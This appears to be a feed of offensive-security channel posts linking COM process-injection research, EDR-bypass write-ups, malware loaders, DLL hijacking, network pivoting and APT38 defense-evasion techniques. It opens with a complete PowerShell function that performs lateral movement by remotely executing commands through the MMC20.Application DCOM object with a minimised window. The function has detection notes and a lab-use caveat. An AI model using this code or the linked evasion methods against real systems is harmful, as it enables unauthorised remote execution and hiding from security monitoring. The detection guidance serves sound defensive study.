Lateral Movement using the MMC20.Application COM Object
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
First part
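The post above only links the write-up, so here is an added example (my own code, not taken from the enigma0x3 article) of the technique it describes: remote activation of the MMC20.Application DCOM object and execution of a command through its Document.ActiveView.ExecuteShellCommand method. Assumptions: you hold local administrator rights on the target, TCP/135 plus the RPC dynamic port range is reachable, and the host in the usage line is a lab machine of your own; the function name and parameters are mine.

```powershell
# Added example: lateral movement via the MMC20.Application DCOM object.
# Assumed: local-admin rights on $Target, DCOM reachable, lab use only.
function Invoke-Mmc20DcomCommand {
    param(
        [Parameter(Mandatory)] [string] $Target,
        [Parameter(Mandatory)] [string] $Command,
        [string] $Arguments = $null,
        # 7 = SW_SHOWMINNOACTIVE: the window is created minimised, not shown to the user.
        [string] $WindowState = '7'
    )

    # GetTypeFromProgID with a server name resolves the CLSID on the remote host;
    # CreateInstance then performs a DCOM activation there. On the target this
    # shows up as svchost.exe (DcomLaunch) starting "mmc.exe -Embedding" under the
    # caller's identity, after a network (type 3) logon from this machine.
    $type = [Type]::GetTypeFromProgID('MMC20.Application', $Target)
    if (-not $type) { throw "MMC20.Application ProgID could not be resolved on $Target" }
    $mmc = [Activator]::CreateInstance($type)

    try {
        # Signature: ExecuteShellCommand(Command, Directory, Parameters, WindowState).
        # The child process is spawned by mmc.exe on the target, which is the
        # parent/child relationship a defender should alert on.
        $mmc.Document.ActiveView.ExecuteShellCommand($Command, $null, $Arguments, $WindowState)
    }
    finally {
        # Drop the proxy; while this session holds a reference the remote mmc.exe
        # stays alive, which is both noisy and a forensic artefact.
        [void][Runtime.InteropServices.Marshal]::ReleaseComObject($mmc)
    }
}

# Lab usage (replace the host with your own test machine):
# Invoke-Mmc20DcomCommand -Target '10.0.0.5' -Command 'C:\Windows\System32\cmd.exe' `
#     -Arguments '/c whoami > C:\Windows\Temp\dcom.txt'
```

Two practical points: the call is synchronous only as far as the activation, so a failing command on the target does not surface as an error here; check the resulting file or process yourself. For detection, look for mmc.exe with a command line of `-Embedding` whose parent is the DcomLaunch svchost.exe and which then spawns cmd.exe, powershell.exe or any other child, together with the preceding network logon from the source host.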
Demystifying Windows Component Object Model (COM)
https://www.221bluestreet.com/offensive-security/windows-components-object-model/demystifying-windows-component-object-model-com
Process Injection via Component Object Model (COM) IRundown::DoCallback()
From MDSec
https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/
#malware_dev
Forwarded from 1N73LL1G3NC3
Demonstration of pivoting with ZeroTier and Nebula during the post-exploitation process. These tools showcase impressive capabilities such as flexible routing, NAT traversal, and the ability to build tunnels between isolated network segments, granting full access to internal infrastructure.
Thx to my bro @casterbyte
Forwarded from CyberSecurityTechnologies (-CST-)
HookChain_new_perspective.pdf
14.4 MB
#Red_Team_Tactics
"HookChain: A new perspective for Bypassing EDR Solutions", 2024.
]-> https://github.com/helviojunior/hookchain
Kimsuky Group's new backdoor appeared (HappyDoor)
https://web.archive.org/web/20240626161026/https://asec.ahnlab.com/ko/67128/
Forwarded from Offensive Xwitter
😈 [ Check Point Research @_CPResearch_ ]
10 years of DLL hijacking - featuring abused executables that shouldn't have existed, exported and malicious DLLs with discount bin "packing." Includes a PoC for app developers to pre-emptively stop hijacking without dealing with a certificate authority.
🔗 https://research.checkpoint.com/2024/10-years-of-dll-hijacking-and-what-we-can-do-to-prevent-10-more/
🐥 [ tweet ]
"Injecting Code into Windows Protected Processes using COM", Part 1 and Part 2, by James Forshaw of the Project Zero team, prompted an interest in COM internals and, more specifically, in the undocumented DoCallback method of the IRundown interface.
- POC
#COM
Forwarded from Order of Six Angles
A damn good article
Red Teaming in the age of EDR: Evasion of Endpoint Detection Through Malware Virtualisation
https://blog.fox-it.com/2024/09/25/red-teaming-in-the-age-of-edr-evasion-of-endpoint-detection-through-malware-virtualisation/
Fox-IT International blog; authors: Boudewijn Meijer and Rick Veldhoven.
The Anti-EDR Compendium
EDR functionality and bypasses in 2024, with focus on undetected shellcode loader.
https://blog.deeb.ch/posts/how-edr-works/
credit : Dobin Rutishauser
x64 WINAPI Recursive Loader
https://web.archive.org/web/20240928164510/https://github.com/Evi1Grey5/Recursive-Loader
#Loader #malware_dev
"Code provided by smelly - vx-underground"
COM PROCESS INJECTION for RUST
https://github.com/0xlane/com-process-inject.git
#malware_dev
Process Injection via Component Object Model (COM) IRundown::DoCallback().
RedTeam Workshop - Part 4
* How do North Korean hackers bypass security mechanisms? *
APT38 attack simulation; this part covers "defense evasion".
Defense Evasion
+ T1562.003 | Impair Command History Logging
+ T1562.004 | Disable or Modify System Firewall
+ T1070.001 | Clear Windows Event Logs
+ T1070.006 | Timestomp
+ T1112 | Modify Registry
+ T1218.001 | Compiled HTML File
+ T1218.011 | Rundll32
https://youtu.be/zDyPRrtXjus?si=265TY6KyElHGr-eR
slides / notes :
https://github.com/soheilsec/RT-workshop-2024
credit : @soheilsec
language : Persian
How to get the COM concurrency model for the current thread.
by Rbmm & Dennis A. Babkin
https://dennisbabkin.com/blog/?t=things-you-thought-you-knew-how-to-get-com-concurrency-model-for-current-thread
#com #reverse_engineer #cpp
Function Graph Overview (VS Code extension)
https://marketplace.visualstudio.com/items?itemName=tamir-bahar.function-graph-overview
ProxyAlloc: evading NtAllocateVirtualMemory detection ft. Elastic Defend & Binary Ninja
In this article, we will explore a method for in-process shellcode execution evasion. This method is specifically designed to avoid the detection of NtAllocateVirtualMemory calls from unsigned DLLs.
https://blog.cryptoplague.net/main/research/windows-research/proxyalloc-evading-ntallocatevirtualmemory-detection-ft.-elastic-defend-and-binary-ninja
credit : Daniil Nababkin